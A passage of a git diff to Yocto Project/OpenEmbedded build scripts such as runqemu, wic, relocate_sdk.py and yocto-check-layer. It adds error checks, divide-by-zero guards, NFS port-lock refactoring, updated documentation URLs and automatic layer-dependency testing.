+ parser.epilog = """
+Examples:
+First generate the .dot file:
+ bitbake -g core-image-minimal
+
+To find out why a package is being built:
+ %(prog)s -k <package> -w ./task-depends.dot
+
+To find out what a package depends on:
+ %(prog)s -k <package> -d ./task-depends.dot
+
+Reduce the .dot file packages only, no tasks:
+ %(prog)s -r ./task-depends.dot
+"""
+
self.args = parser.parse_args()
if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
if key == "meta-world-pkgdata":
continue
dep = m.group(2)
+ key = key.split('.')[0]
+ dep = dep.split('.')[0]
+ if key == dep:
+ continue
if key in depends:
if not key in depends[key]:
depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
def load_recipes(self):
+ if not os.path.exists(pkgdata):
+ sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
for recipe in sorted(os.listdir(pkgdata)):
if os.path.isfile(os.path.join(pkgdata, recipe)):
self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-pkgdata-util b/scripts/oe-pkgdata-util
index 93220e3617..75dd23efa3 100755
--- a/scripts/oe-pkgdata-util
+++ b/scripts/oe-pkgdata-util
@@ -598,6 +598,9 @@ def main():
logger.error("Unable to find bitbake by searching parent directory of this script or PATH")
sys.exit(1)
logger.debug('Found bitbake path: %s' % bitbakepath)
+ if not os.environ.get('BUILDDIR', ''):
+ logger.error("This script can only be run after initialising the build environment (e.g. by using oe-init-build-env)")
+ sys.exit(1)
tinfoil = tinfoil_init()
try:
args.pkgdata_dir = tinfoil.config_data.getVar('PKGDATA_DIR')
diff --git a/scripts/oe-run-native b/scripts/oe-run-native
index 4e63e69cc4..22958d97e7 100755
--- a/scripts/oe-run-native
+++ b/scripts/oe-run-native
@@ -43,7 +43,7 @@ fi
OLD_PATH=$PATH
# look for a tool only in native sysroot
-PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin/*-native -maxdepth 1 -type d -printf ":%p")
+PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin -maxdepth 1 -name "*-native" -type d -printf ":%p")
tool_find=`/usr/bin/which $tool 2>/dev/null`
if [ -n "$tool_find" ] ; then
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
cat <<EOM
The Yocto Project has extensive documentation about OE including a reference
manual which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org
For more information about OpenEmbedded see their website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
EOM
# unset SHOWYPDOC
diff --git a/scripts/postinst-intercepts/update_font_cache b/scripts/postinst-intercepts/update_font_cache
index 46bdb8c572..900db042d6 100644
--- a/scripts/postinst-intercepts/update_font_cache
+++ b/scripts/postinst-intercepts/update_font_cache
@@ -5,6 +5,8 @@
set -e
+rm -f $D${fontconfigcachedir}/CACHEDIR.TAG
+
PSEUDO_UNLOAD=1 ${binprefix}qemuwrapper -L $D -E ${fontconfigcacheenv} $D${libexecdir}/${binprefix}fc-cache --sysroot=$D --system-only ${fontconfigcacheparams}
chown -R root:root $D${fontconfigcachedir}
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
# avoid divide by zero
if max_y == 0:
max_y = 1.0
- xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ if (max_x - x_shift):
+ xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ else:
+ xscale = float (chart_bounds[2])
# If data_range is given, scale the chart so that the value range in
# data_range matches the chart bounds exactly.
# Otherwise, scale so that the actual data matches the chart bounds.
- if data_range:
+ if data_range and (data_range[1] - data_range[0]):
yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
ybase = data_range[0]
else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
def compile(self, writer):
def find_parent_id_for(pid):
- if pid is 0:
+ if pid == 0:
return 0
ppid = self.parent_map.get(pid)
if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
if (len(new_dl_path) >= p_filesz):
print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
% (elf_file_name, p_memsz, len(new_dl_path) + 1))
- break
+ return False
dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
f.seek(p_offset)
f.write(dl_path)
break
+ return True
def change_dl_sysdirs(elf_file_name):
if arch == 32:
@@ -215,6 +216,7 @@ else:
executables_list = sys.argv[3:]
+errors = False
for e in executables_list:
perms = os.stat(e)[stat.ST_MODE]
if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
arch = get_arch()
if arch:
parse_elf_header()
- change_interpreter(e)
+ if not change_interpreter(e):
+ errors = True
change_dl_sysdirs(e)
""" change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
print("New file size for %s is different. Looks like a relocation error!", e)
sys.exit(-1)
+if errors:
+ print("Relocation of one or more executables failed.")
+ sys.exit(-1)
diff --git a/scripts/runqemu b/scripts/runqemu
index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
raise RunQemuError('BIOS not found: %s' % bios_match_name)
if not os.path.exists(self.bios):
- raise RunQemuError("KERNEL %s not found" % self.bios)
+ raise RunQemuError("BIOS %s not found" % self.bios)
def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
else:
self.nfs_server = '192.168.7.1'
- # Figure out a new nfs_instance to allow multiple qemus running.
- ps = subprocess.check_output(("ps", "auxww")).decode('utf-8')
- pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) '
- all_instances = re.findall(pattern, ps, re.M)
- if all_instances:
- all_instances.sort(key=int)
- self.nfs_instance = int(all_instances.pop()) + 1
-
- nfsd_port = 3049 + 2 * self.nfs_instance
- mountd_port = 3048 + 2 * self.nfs_instance
+ nfsd_port = 3048 + self.nfs_instance
+ lockdir = "/tmp/qemu-port-locks"
+ self.make_lock_dir(lockdir)
+ while not self.check_free_port('localhost', nfsd_port, lockdir):
+ self.nfs_instance += 1
+ nfsd_port += 1
+ mountd_port = nfsd_port
# Export vars for runqemu-export-rootfs
export_dict = {
'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
+ def make_lock_dir(self, lockdir):
+ if not os.path.exists(lockdir):
+ # There might be a race issue when multi runqemu processess are
+ # running at the same time.
+ try:
+ os.mkdir(lockdir)
+ os.chmod(lockdir, 0o777)
+ except FileExistsError:
+ pass
+ return
+
def setup_slirp(self):
"""Setup user networking"""
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
mac = 2
lockdir = "/tmp/qemu-port-locks"
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
# Find a free port to avoid conflicts
for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
logger.error("ip: %s" % ip)
raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
cmd = (ip, 'link')
logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
for ovmf in self.ovmf_bios:
format = ovmf.rsplit('.', 1)[-1]
+ if format == "bin":
+ format = "raw"
self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
self.release_taplock()
- self.release_portlock()
if self.nfs_running:
logger.info("Shutting down the userspace NFS server...")
cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
+ self.release_portlock()
if self.saved_stty:
subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
def sigterm_handler(signum, frame):
logger.info("SIGTERM received")
- os.kill(config.qemupid, signal.SIGTERM)
+ if config.qemupid:
+ os.kill(config.qemupid, signal.SIGTERM)
config.cleanup()
# Deliberately ignore the return code of 'tput smam'.
subprocess.call(["tput", "smam"])
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
args = parser.parse_args()
if shutil.which("checkbashisms.pl") is None:
- print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl")
+ print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
sys.exit(1)
# The order of defining the worker function,
diff --git a/scripts/wic b/scripts/wic
index 24700f380f..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
import argparse
import logging
import subprocess
+import shutil
from collections import namedtuple
-from distutils import spawn
# External modules
scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
break
sdkroot = os.path.dirname(sdkroot)
-bitbake_exe = spawn.find_executable('bitbake')
+bitbake_exe = shutil.which('bitbake')
if bitbake_exe:
bitbake_path = scriptpath.add_bitbake_lib_path()
import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
logger.info(" (Please check that the build artifacts for the machine")
logger.info(" selected in local.conf actually exist and that they")
logger.info(" are the correct artifacts for the image (.wks file)).\n")
- raise WicError("The artifact that couldn't be found was %s:\n %s", not_found, not_found_dir)
+ raise WicError("The artifact that couldn't be found was %s:\n %s" % (not_found, not_found_dir))
krootfs_dir = options.rootfs_dir
if krootfs_dir is None:
@@ -312,6 +312,8 @@ def wic_init_parser_create(subparser):
subparser.add_argument("-o", "--outdir", dest="outdir", default='.',
help="name of directory to create image in")
+ subparser.add_argument("-w", "--workdir",
+ help="temporary workdir to use for intermediate files")
subparser.add_argument("-e", "--image-name", dest="image_name",
help="name of the image to use the artifacts from "
"e.g. core-image-sato")
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
scriptpath.add_oe_lib_path()
scriptpath.add_bitbake_lib_path()
-from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers
+from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
from oeqa.utils.commands import get_bb_vars
PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
help='File to output log (optional)', action='store')
parser.add_argument('--dependency', nargs="+",
help='Layers to process for dependencies', action='store')
+ parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
+ action='store_true')
parser.add_argument('--machines', nargs="+",
help='List of MACHINEs to be used during testing', action='store')
parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
if not layers:
return 1
+ # Find all dependencies, and get them checked too
+ if not args.no_auto_dependency:
+ depends = []
+ for layer in layers:
+ layer_depends = get_layer_dependencies(layer, dep_layers, logger)
+ if layer_depends:
+ for d in layer_depends:
+ if d not in depends:
+ depends.append(d)
+
+ for d in depends:
+ if d not in layers:
+ logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
+ layers.append(d)
+
shutil.copyfile(bblayersconf, bblayersconf + '.backup')
def cleanup_bblayers(signum, frame):
shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
layer['type'] == LayerType.ERROR_BSP_DISTRO:
continue
+ # Reset to a clean backup copy for each run
+ shutil.copyfile(bblayersconf + '.backup', bblayersconf)
+
if check_bblayers(bblayersconf, layer['path'], logger):
logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
"in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
layer['path']))
- shutil.copyfile(bblayersconf + '.backup', bblayersconf)
-
missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
if not missing_dependencies:
for additional_layer in additional_layers:
if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
missing_dependencies = True
break
- if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \
- any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
- additional_layers)):
+ if missing_dependencies:
logger.info('Skipping %s due to missing dependencies.' % layer['name'])
results[layer['name']] = None
results_status[layer['name']] = 'SKIPPED (Missing dependencies)'